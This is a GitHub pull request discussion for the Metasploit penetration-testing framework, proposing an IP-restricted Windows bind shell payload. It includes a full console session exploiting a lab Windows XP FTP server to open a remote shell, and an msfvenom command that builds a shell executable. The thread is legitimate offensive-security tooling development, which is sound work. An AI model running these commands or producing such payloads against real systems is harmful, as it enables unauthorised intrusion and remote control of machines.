added ACL Bind Shell payload #2981

Closed
wants to merge 1 commit into
from

Projects

None yet

5 participants

@BorjaMerino

Single tcp bind shell with ACL support (only the IP you set will get the shell). It's just an alternative to the classic bind shell. I think it could be useful if you do not want someone else to steal your shell with a simple netcat. I used the shell_bind_tcp of Stephen Fewer and I modified the accept() call to check the client IP ( this is an increase of 22 bytes.). If the IP is not the one defined in AHOST (Allowed IP) the descriptor is closed and the socket waits for another connection.

I add .asm files, the payload and the respective handler (I used the bind shell handler with a couple of modifications). Let me know other changes needed.

@OJ
OJ commented Feb 12, 2014

This looks cool! Do you happen to have sample output/demo usage?

Thanks!

@BorjaMerino

@OJ Thank you.
You only have to use the AHOST to specify the IP allowed to get the shell (Others will be rejected) Ej:

msf> use exploit/windows/ftp/pcman_stor
msf exploit(pcman_stor) > set rhost 192.168.1.39
rhost => 192.168.1.39
msf exploit(pcman_stor) > set payload windows/shell_acl_bind_tcp
payload => windows/shell_acl_bind_tcp
msf exploit(pcman_stor) > set lport 5041
lport => 5041
msf exploit(pcman_stor) > ifconfig | grep 192
[*] exec: ifconfig | grep 192

          inet addr:192.168.1.33  Bcast:192.168.1.255  Mask:255.255.255.0
msf exploit(pcman_stor) > set ahost 192.168.1.33
ahost => 192.168.1.33
msf exploit(pcman_stor) > exploit

[*] Connecting to FTP server 192.168.1.39:21...
[*] Started ACL bind handler
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] Trying victim Windows XP SP3 English...
[*] Command shell session 1 opened (192.168.1.33:59686 -> 192.168.1.39:5041) at 2014-02-12 04:49:35 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Test\My Documents\Downloads>

Example with msfvenom:

./msfvenom -p windows/shell_acl_bind_tcp AHOST=10.0.0.100 LPORT=1009 -f exe  > batman.exe

In this case, only 10.0.0.100 will get the shell

Edit by OJ: Added code format tags

@wvu-r7

I am sad that @BorjaMerino didn't make a cool video with awesome music this time. Perhaps next time. :P

@BorjaMerino

@wvu-r7 xDD Who said that? Stay tuned

@wvu-r7

I love your YouTube videos! :D

@BorjaMerino

Since single (#3017) and starger (#3394) bind shell approach is an improved version of this shellcode feel free to refuse this pull request.

@Meatballs1

Closing in favour of #3017 then

@Meatballs1 Meatballs1 closed this Jun 7, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment